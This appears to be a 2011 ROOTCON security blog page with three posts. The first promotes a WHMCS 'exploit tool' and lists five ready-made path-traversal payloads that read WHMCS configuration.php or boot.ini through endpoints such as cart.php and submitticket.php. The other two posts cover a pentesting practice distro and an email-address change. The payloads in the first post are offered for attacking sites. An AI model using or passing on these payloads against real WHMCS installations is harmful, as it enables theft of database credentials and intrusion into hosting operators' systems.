Tuesday, November 29, 2011

ProjectX WHMCS Exploit Tool


With the growing attacks of Local File Disclosure for WHMCS, I recently posted a Python Script which checks the vulnerability of a website powered  by WHMCS which my friend and I coded but I decided to dump it. 


But with the help of another friend whose name is lufi, we were able to materialize the same tool but this time it is coded in PHP and is user friendly. It is still aimed at exploiting WHMCS but we allow users to choose their own payload. 

Here are some payloads that may come in handy:
cart.php?a=projectx&templatefile=../../../configuration.php"
clients/cart.php?a=projectx&templatefile=../../../configuration.php"
submitticket.php?step=projectx&templatefile=../../../../../../../../../boot.ini
clientarea.php?action=projectx&templatefile=../../configuration.php
reports.php?report=../../../../../../../boot.ini

You can download the full script here


About the Contributor:
Shipcode is a prolific blogger of ROOTCON and at the same time an InfoSec enthusiast from Cebu. He was inspired to join ROOTCON as part of the core team to share his knowledge in information security.  He encourages other like minded individuals to come forward and share their knowledge through blogging right here at ROOTCON Blog section.

ROOTCON is managed by like minded InfoSec professionals across the Philippines.  All rights reserved. Designated trademarks, brands and articles are the property of their respective owners.
Read More

Wednesday, November 16, 2011

Filipino Penetration Testing Linux Distro on the Making


BackTrack, Blackbuntu, Backbox, Nodezro PHLAK, Knoppix-STD, Helix, etc.; these Linux distros are the common penetration testing distributions known today. But did you know that another Filipino is on the move on making a pentesting distro? Aside from semprix (the founder of ROOTCON) who is planning to make a BSD pentesting distro, we also have creatures who is currently developing a new Linux Distro which is the Project Playground.


Project Playground or “Pipi” is a pentesting distro based on Debian. It centers on web application security practice, it is packed with web apps intended to have vulnerabilities and weaknesses for you to practice. This includes DVWA, mutillidae, gruyere and webgoat and many more. Aside from those mentioned, articles and tutorials are also included.




For now the alpha release is available for download and I have already tried it. Kudos to creatures for the Alpha Release and for adding Nikto after my suggestion about the inclusion of the said tool and because it is still under development, you can email creatures at ysda27[at]gmail[dot]com or visit his website for more updates about his project. I hope he will add Metasploit on his distro! Creatures is currently planning on creating a GUI (Graphical User Interface) for the tools and web apps and you can stalk some of his tutorials on the ProjectX Blog.


About the Contributor:
Shipcode is a prolific blogger of ROOTCON and at the same time an InfoSec enthusiast from Cebu. He was inspired to join ROOTCON as part of the core team to share his knowledge in information security.  He encourages other like minded individuals to come forward and share their knowledge through blogging right here at ROOTCON Blog section.

ROOTCON is managed by like minded InfoSec professionals across the Philippines.  All rights reserved. Designated trademarks, brands and articles are the property of their respective owners.
Read More

Monday, November 07, 2011

ROOTCON Email Updates

We have decommissioned info [at] rootcon d0t org, for all general inquiries send them to the new email address at comms /you-know-what/ rootcon dot org.

Details can be found at
http://www.rootcon.org/xml/contacts - Contact Details
http://www.rootcon.org/xml/faq/ - FAQ
Read More